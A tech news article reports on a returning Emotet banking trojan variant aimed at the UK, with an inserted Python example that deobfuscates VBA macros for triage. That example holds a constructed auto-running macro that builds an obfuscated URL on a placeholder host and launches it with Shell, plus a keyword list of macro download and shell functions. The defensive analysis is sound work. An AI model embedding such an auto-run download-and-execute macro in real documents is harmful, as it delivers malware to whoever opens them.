Banking Trojan Emotet Returns ‘With A Vengeance’ To Strike UK

The banking trojan Emotet has evolved, and a new variant is ‘back with a vengeance’ with the UK in its sights.

This is the warning from security firm Zscaler, which said that 76 percent of Emotet’s attacks so far have been aimed at the United Kingdom.

The trojan first reared its head back in 2014, and its main mission in life is to steal banking credentials and harvest emails.

Emotet Trojan

According to Zscaler the Emotet trojan is commonly distributed through documents with highly obfuscated macros. These macros contain “payloads to download and install the Trojan onto a victim’s machine.”

Emotet has also been known to download other malware nastiness on infected hosts and three years ago it “wreaked havoc in Europe and the United States.”

But now the Zscaler Threat Research team has been monitoring the new variant of Emotet since April 2017 and has recently seen a spike in Emotet related spam activity.

Emotet is described as multi-component malware which specialises in stealing credentials from browsers and mail clients. It also conducts bank theft via man-in-the-browser attack, email harvesting and propagation through spam emails from infected systems.

These spam campaigns often contain a malicious file attachment or a link to a malicious URL hosting a JavaScript or a document file. This in turn downloads and installs the Emotet payload.

But the new variant is using malicious document files with highly obfuscated macros to serve the Emotet payload.

“Obfuscated VBS macro code contains predetermined URLs with code to download and install Emotet payload on the victim machine,” warned Zscaler. “The downloaded executable is packed with a custom packer which has encrypted data hiding the Emotet executable and the code to load it. When executed, this data is decrypted in the memory using a custom algorithm.”
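An added example, not code from Zscaler’s report or from this article: a small Python triage helper that undoes the simple Chr()/string-concatenation obfuscation described above and reports the URLs and auto-run or shell keywords a defender would want to look at. The macro text, the function names and the .invalid host name are all constructed for illustration.

```python
import re

# Constructed sample of an obfuscated VBA macro used only as test input;
# it is not a real Emotet sample and the host is a reserved .invalid name.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, c As String
    u = Chr(104) & Chr(116) & "tp://dow" & "nload.exa" & "mple.invalid/up" & Chr(100) & ".exe"
    c = "sta" & "rt " & u
    Shell c, 0
End Sub
'''

CHR_RE = re.compile(r'Chr\((\d+)\)', re.IGNORECASE)
# Two adjacent string literals joined by VBA's & operator: "ab" & "cd"
CONCAT_RE = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
SUSPICIOUS = ("AutoOpen", "Document_Open", "Shell", "CreateObject",
              "URLDownloadToFile", "WScript.Shell")


def decode_chr(text):
    """Replace Chr(n) calls with the equivalent quoted one-character literal.
    A double quote (Chr(34)) is left untouched so quoting stays balanced."""
    def repl(m):
        ch = chr(int(m.group(1)))
        return m.group(0) if ch == '"' else '"%s"' % ch
    return CHR_RE.sub(repl, text)


def join_literals(text):
    """Fold chained "a" & "b" literals until no adjacent pair remains."""
    while True:
        new = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
        if new == text:
            return new
        text = new


def deobfuscate(text):
    return join_literals(decode_chr(text))


def analyze(macro):
    """Return the indicators a triage analyst would record for a macro."""
    clean = deobfuscate(macro)
    return {
        "chr_calls": len(CHR_RE.findall(macro)),      # obfuscation density
        "concat_ops": macro.count("&"),
        "keywords": [k for k in SUSPICIOUS if k.lower() in clean.lower()],
        "urls": URL_RE.findall(clean),                 # embedded download URLs
    }
```

Real macros also hide strings behind StrReverse, Replace and arithmetic on character codes, so treat this as the first pass of a triage script rather than a complete decoder.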

“Upon successful infection, Emotet registers the compromised host with the C&C server by sending information such as computer name, CPU architecture and OS version, as well as a list of active processes and whether they were executed with administrator privilege,” the security specialist warned.


Banking Trojan

Zscaler ThreatLabZ said it was actively monitoring this threat and will continue to ensure coverage for Zscaler customers.

Banking trojans are unfortunately fairly common nowadays. In April IBM security researchers warned about a change in tactics by the operators of the TrickBot Trojan.

The researchers found that private banks, private wealth management firms, investment banking, and even a retirement insurance and annuity company were now in its cross-hairs.

Also this year security specialists Dr Web found a banking trojan based on the source code of the infamous Zeus malware.

Dubbed Trojan.PWS.Sphinx.2, that trojan’s main purpose is to inject malicious content into webpages, for example a fake form for entering login and password details, so that cyber criminals can secretly harvest the credentials of people browsing the web.


Tom Jowitt

Tom Jowitt is a leading British tech freelancer and long standing contributor to Silicon UK. He is also a bit of a Lord of the Rings nut...
